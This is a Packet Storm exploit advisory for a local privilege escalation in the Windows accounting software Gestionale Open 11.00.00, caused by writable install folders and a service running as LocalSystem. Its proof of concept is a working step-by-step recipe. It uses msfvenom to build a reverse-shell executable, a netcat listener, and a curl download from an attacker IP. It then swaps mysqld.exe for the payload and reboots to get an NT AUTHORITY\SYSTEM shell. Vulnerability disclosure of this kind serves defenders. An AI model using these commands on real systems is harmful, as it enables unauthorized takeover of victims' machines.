exploit the possibilities

Gestionale Open 11.00.00 Privilege Escalation

Gestionale Open 11.00.00 Privilege Escalation
Posted Oct 25, 2021
Authored by Alessandro Salzano

Gestionale Open version 11.00.00 suffers from a local privilege escalation vulnerability.

tags | exploit, local
MD5 | 434cabbe8d061a0f0132600775b3babf

Gestionale Open 11.00.00 Privilege Escalation

Change Mirror Download
# Exploit Title: Gestionale Open 11.00.00 - Local Privilege Escalation
# Date: 2021-07-19
# Author: Alessandro 'mindsflee' Salzano
# Vendor Homepage: https://www.gestionaleopen.org/
# Software Homepage: https://www.gestionaleopen.org/
# Software Link: https://www.gestionaleopen.org/wp-content/uploads/downloads/ESEGUIBILI_STANDARD/setup_go_1101.exe
# Version: 11.00.00
# Tested on: Microsoft Windows 10 Enterprise x64

With GO - Gestionale Open - it is possible to manage, check and print every aspect of accounting according to the provisions of Italian taxation.

Vendor: Gestionale Open srl.

Affected version: > 11.00.00


# Details
# By default the Authenticated Users group has the modify permission to Gestionale Open folders/files as shown below.
# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.

The application also have unquoted service path issues.

(1) Impacted services.
Any low privileged user can elevate their privileges abusing MariaDB service:

C:\Gestionale_Open\MySQL57\bin\mysqld.exe


Details:



SERVICE_NAME: DB_GO
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Gestionale_Open\MySQL57\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL57\my.ini DB_GO
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DB_GO
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem



(2) Folder permissions.
Insecure folders permissions issue:


C:\Gestionale_Open Everyone:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)



# Proof of Concept

1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe

2. Setup listener and ensure apache is running on attacking machine
nc -lvp 4242
service apache2 start

3. Download malicious .exe on victim machine
type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Gestionale_Open\MySQL57\bin\mysqld_evil.exe"

4. Overwrite file and copy malicious .exe.
Renename C:\Gestionale_Open\MySQL57\bin\mysqld.exe > mysqld.bak
Rename downloaded 'mysqld_evil.exe' file in mysqld.exe

5. Restart victim machine

6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system

Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    23 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close